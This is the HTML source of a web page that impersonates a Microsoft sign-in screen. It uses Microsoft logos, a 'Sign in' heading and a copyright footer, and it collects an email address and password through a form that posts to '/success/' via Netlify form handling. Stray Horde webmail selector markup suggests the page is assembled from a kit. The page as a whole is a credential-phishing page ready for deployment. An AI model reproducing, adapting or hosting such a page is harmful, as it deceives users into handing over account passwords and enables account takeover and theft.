<!DOCTYPE html>
<html>
<head>
<link rel="shortcut icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/5/5f/Microsoft_Office_logo_%282019%E2%80%93present%29.svg/1200px-Microsoft_Office_logo_%282019%E2%80%93present%29.svg.png">>
	<meta charset="UTF-8">
	<title>Microsoft</title>
	<link href="style.css" rel="stylesheet">
</head>
<body>
<body style="background-color:white;">
<p>
<p>
<div class="login-page">
<div class="form">
<form name="contact"  action="/success/" method="POST" data-netlify="true">
<img align="middle" alt="Microsoft" src="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg""200" width="190">

   </div>

    </p>
<fieldset>
<div style="text-align:center;">
<img align="top" alt="Microsoft" src="https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcQuLDytnGMHP-iC_u6xMkWEqkbCiosTlnojbA&usqp=CAU" width="130" height="90">
<p style="color:#0C0C0C" ;=""></p>
<strong class="challenge-heading">Sign in</strong>
<h4 translate="LANG_CUSTOM_LOGIN_INFOBOX_TITLE" translate-cloak="LANG_CUSTOM_LOGIN_INFOBOX_TITLE" class="ng-scope"></h4>
        <input type="text" name="username" id="username" title="username" value="" onfocus="this.select()" tabindex="1" placeholder="Email Address">
        <br>
        <br>
        <input type="password" name="password" id="password" title="password" tabindex="2" placeholder="Password">
        <input type="hidden" name="u" value="email/webmail">
        <input type="hidden" name="c" value="">
        <br>
        <br>

    <button type="Login submit-button">Next</button>
	<div id="horde_select_view_div" style="">
 <div><label for="horde_select_view">Interface</label></div>
 <div>
  <select id="horde_select_view" name="horde_select_view">
   <option value="auto">Automatic</option>
   <option value="" disabled="disabled">- - - - - - - - - -</option>
   <option value="Simple">Simple (Any browser)</option>
   <option value="dynamic">Simple (Ajax)</option>
   <option value="smartmobile">Advanced NoPopups (Mozilla)</option>
   <option value="mobile">Advanced (Mozilla)</option>
   
  </select>
 </div>
</div>
  </p>
</form>

	© Microsoft 
			&nbsp;●&nbsp; <a href="https://www.microsoft.com/en-US/servicesagreement/" target="_blank" class="support-link"></a>
       
</div>				